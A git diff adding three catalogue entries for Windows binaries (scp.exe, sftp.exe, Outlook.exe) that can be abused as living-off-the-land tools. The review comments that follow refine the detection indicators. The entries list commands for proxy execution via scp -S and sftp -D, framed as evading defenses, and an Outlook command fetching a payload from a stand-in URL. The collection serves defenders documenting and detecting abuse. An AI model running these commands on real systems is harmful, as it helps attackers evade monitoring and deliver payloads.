diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml new file mode 100644 index 00000000..8a895a25 --- /dev/null +++ b/yml/OSBinaries/scp.yml @@ -0,0 +1,42 @@ +--- +Name: scp.exe +Description: Secure Copy Protocol +Author: Nir Chako +Created: 2022-11-14 +Commands: + - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' + Description: Execute notepad.exe with scp.exe as parent process + Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128: " + Description: Download file with scp.exe from an SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128:" + Description: Upload file with scp.exe to an SSH server + Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp " + Description: Copy file with scp.exe to a local path + Usecase: Use scp.exe to Copy a file from one location to another. + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\scp.exe +Detection: + - IOC: scp.exe spawning unexpected processes + - IOC: Suspicious SSH internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml new file mode 100644 index 00000000..22396c96 --- /dev/null +++ b/yml/OSBinaries/sftp.yml 
@@ -0,0 +1,20 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml 
@@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0'
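Review bot: In the scp.yml hunk, the Download, Upload and Copy entries (`scp @192.168.187.128: `, `scp @192.168.187.128:` and `scp `) are missing the username, remote path and local path, so none of the three is a runnable command line as written; please spell each out with explicit placeholders for the user, the remote file and the local destination, the way the first entry gives a concrete path. The Copy entry is a local-to-local copy yet carries the same MitreID (T1105, Ingress Tool Transfer) as the two network transfers; check whether that mapping is intended. For the first entry, `-S` replaces the program scp uses to open the connection, so notepad.exe is started by scp.exe with scp's own ssh argument list; the Detection section would be more useful if, next to "scp.exe spawning unexpected processes", it also named that command-line pattern (scp.exe invoked with `-S` pointing at anything other than ssh.exe).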
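Review bot: In the sftp.yml hunk, the only IOC is "sftp.exe spawning unexpected processes", but the technique has a more specific signature: `-D` tells sftp to start the given path as the SFTP server over a local pipe instead of going through ssh, so sftp.exe launched with `-D` pointing at anything other than the OpenSSH sftp-server binary is the indicator worth listing, and it is cheaper to match on the command line than on every child process. Also, the path escaping differs between the two OpenSSH entries: this command is a double-quoted YAML string with `\\`, while scp.yml uses a single-quoted string with `\`; both resolve to a single backslash, but one convention across the two files would be better.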
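Review bot: In the Outlook.yml hunk, `C:\Program Files\Microsoft Office\Office12\Outlook.exe` appears twice in Full_Path (the last two Path entries are identical), so one of them should be dropped. The single IOC, "Suspicious Office application internet/network traffic", is not specific to this technique; the visible trigger is Outlook.exe being started with a URL as its argument, so add an IOC on that command-line pattern (outlook.exe launched with an http or https argument) and, given the Usecase says the payload lands in the cache folder, a file-creation IOC for Outlook.exe writing under `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE`. Minor: the Person field is unquoted here while the other two files quote it; match the existing convention.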